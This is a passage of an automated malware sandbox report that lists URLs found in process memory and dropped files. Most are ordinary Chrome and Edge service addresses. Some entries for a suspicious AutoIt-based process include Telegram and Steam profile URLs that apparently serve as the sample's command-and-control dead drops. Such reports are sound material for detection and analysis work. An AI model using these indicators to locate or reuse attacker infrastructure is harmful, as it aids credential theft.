                Source: chrome.exe, 00000015.00000002.1896643585.0000593800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardY8$
                Source: chrome.exe, 00000015.00000002.1897714490.0000593800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardY8w_
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000015.00000002.1897714490.0000593800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000015.00000002.1887440283.000036EC00474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855954556.000036EC01CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1894195178.000036EC01314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853758816.000036EC01BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855483232.000036EC01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855244225.000036EC01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000015.00000003.1801797294.00005938006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1897681290.0000593800744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918p
                Source: chrome.exe, 00000015.00000002.1897681290.0000593800744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000015.00000002.1887440283.000036EC00474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855954556.000036EC01CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1894195178.000036EC01314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853758816.000036EC01BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855483232.000036EC01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855244225.000036EC01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                Source: Cookies.29.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.29.drString found in binary or memory: https://msn.comXIDv101
                Source: chrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887531372.000036EC004B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887531372.000036EC004B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000015.00000002.1892732150.000036EC00EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000015.00000003.1810253687.000036EC00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889585937.000036EC009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 000003.log1.28.dr, 2cc80dabc69f58b6_0.28.drString found in binary or memory: https://ntp.msn.com
                Source: QuotaManager.28.drString found in binary or memory: https://ntp.msn.com/_default
                Source: Session_13379760324698647.28.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.28.dr, QuotaManager-journal.28.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 2cc80dabc69f58b6_0.28.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000015.00000002.1886075546.000036EC000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000015.00000003.1810253687.000036EC00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889585937.000036EC009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000015.00000002.1889585937.000036EC009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000015.00000002.1885904115.000036EC0008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000015.00000002.1885983831.000036EC000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsManage
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000015.00000002.1887440283.000036EC00474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855954556.000036EC01CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853758816.000036EC01BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855483232.000036EC01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855244225.000036EC01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Centered.com, 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Centered.com, 00000010.00000003.1613361743.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613403896.000000000494B000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613621165.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613642833.000000000491D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Centered.com, 00000010.00000002.2502854926.0000000001951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Centered.com, 00000010.00000003.1613361743.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613403896.000000000494B000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613621165.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613642833.000000000491D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Centered.com, 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2505513959.0000000004A0D000.00000040.00001000.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael/
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelG
                Source: Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Centered.com, 00000010.00000002.2502854926.0000000001951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/s
                Source: chrome.exe, 00000015.00000002.1889667260.000036EC00A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2505513959.0000000004A0D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: din.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, XTRIWB.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: Centered.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 00000015.00000003.1834090131.000036EC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000015.00000003.1813667267.000036EC00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1809425650.000036EC004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000015.00000002.1888858362.000036EC0081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Chartk3
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2me/6
                Source: chrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: chrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos6.
                Source: content_new.js.28.dr, content.js.28.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000015.00000002.1889349825.000036EC00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888460148.000036EC00714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888951306.000036EC00874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000015.00000002.1889349825.000036EC00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888460148.000036EC00714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888951306.000036EC00874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890172831.000036EC00B8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887865879.000036EC005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 00000015.00000002.1887440283.000036EC00474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855954556.000036EC01CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1894195178.000036EC01314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853758816.000036EC01BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855483232.000036EC01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855244225.000036EC01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000015.00000003.1834090131.000036EC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
